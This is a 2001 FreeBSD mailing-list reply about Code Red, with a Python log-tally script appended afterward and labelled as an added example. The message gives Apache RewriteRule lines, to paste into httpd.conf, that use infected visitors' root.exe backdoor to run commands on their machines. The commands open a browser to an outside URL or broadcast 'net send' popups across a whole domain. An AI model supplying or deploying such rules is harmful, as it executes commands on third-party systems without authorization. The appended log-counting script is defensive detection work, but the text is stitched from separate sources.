Delivered-To: freebsd-ports@freebsd.org
Message-ID: <010e01c13a5d$0a208f00$2801010a@MIKELT>
From: "Michael Scheidell"
References: <3B98DCF5.5851.5521A430@localhost>
Subject: Re: Apache::CodeRed : anyone thought of porting it?
Date: Mon, 10 Sep 2001 17:59:41 -0700
Organization: Florida Datamation, Inc.

----- Original Message -----
From: "Dan Langille"
Newsgroups: local.freebsd.ports
Sent: Friday, September 07, 2001 11:43 AM
Subject: Apache::CodeRed : anyone thought of porting it?

> Has anyone thought of porting Apache::CodeRed?  See
> http://www.onlamp.com/pub/a/apache/2001/08/16/code_red.html for details.

Other option is to use the Apache rewrite module and use the same 'sploit to send a net popup or start a copy of IE
(note: if using virtual servers, you will want this on the default one, the one hit when looking at the IP address).

No wraps on this. Put this in /usr/local/etc/apache/httpd.conf and restart Apache.

RewriteEngine on

No wraps below (one line):

RewriteRule ^(.*)/default.ida(.*) http://%{REMOTE_ADDR}/c/inetpub/scripts/root.exe?/c+start+http://24.17.180.183/anticodered.html

Or this (if you want to send a net popup to hundreds, maybe thousands of systems on the same domain):

RewriteEngine on
RewriteRule ^(.*)/default.ida(.*) http://%{REMOTE_ADDR}/c/inetpub/scripts/root.exe?/c+net+send+*+Your+computer+is+infected+by+a+Code+Red+Worm.+I+did+not+infect+you.+This+is+a+courtesy+response+generated+when+your+computer+attempted+to+infect+mine.+Your+computer+is+completely+exposed.+Visit+http://www.dynwebdev.com/codered/alert.htm+immediately.
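
The rewrite rules above key on requests for `/default.ida`; the same pattern can be tallied from the Apache access log to see which hosts are probing and how often, for example to feed an abuse report. This is an added example, not part of the original message: it assumes Common Log Format, the log lines are constructed (documentation-range addresses, shortened padding), and the name `tally_code_red_probes` is hypothetical.

```python
import re
from collections import Counter

# Apache Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+')

# Constructed sample lines (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [10/Sep/2001:14:02:11 -0400] "GET /default.ida?NNNNNNNNNNNN%u9090%u6858 HTTP/1.0" 404 276
198.51.100.7 - - [10/Sep/2001:14:03:40 -0400] "GET /default.ida?XXXXXXXXXXXX%u9090%u6858 HTTP/1.0" 404 276
192.0.2.10 - - [10/Sep/2001:14:09:02 -0400] "GET /DEFAULT.IDA?NNNNNNNNNNNN%u9090 HTTP/1.0" 404 276
203.0.113.5 - - [10/Sep/2001:14:10:00 -0400] "GET /search?q=default.ida HTTP/1.0" 200 512
203.0.113.5 - - [10/Sep/2001:14:11:00 -0400] "GET /index.html HTTP/1.0" 200 1024
this line is not in common log format
"""


def tally_code_red_probes(log_text):
    """Return (Counter of probes per client address, count of unparsable lines)."""
    hits, skipped = Counter(), 0
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            skipped += 1
            continue
        host, request, _status = m.groups()
        parts = request.split()
        if len(parts) < 2:
            continue  # empty or truncated request line
        # Compare the URL path only, case-insensitively, so a query string
        # that merely mentions default.ida is not counted as a probe.
        path = parts[1].split("?", 1)[0].lower()
        if path.endswith("/default.ida"):
            hits[host] += 1
    return hits, skipped


if __name__ == "__main__":
    hits, skipped = tally_code_red_probes(SAMPLE_LOG)
    for host, count in hits.most_common():
        print(f"{host}\t{count}")
    print(f"unparsable lines: {skipped}")
```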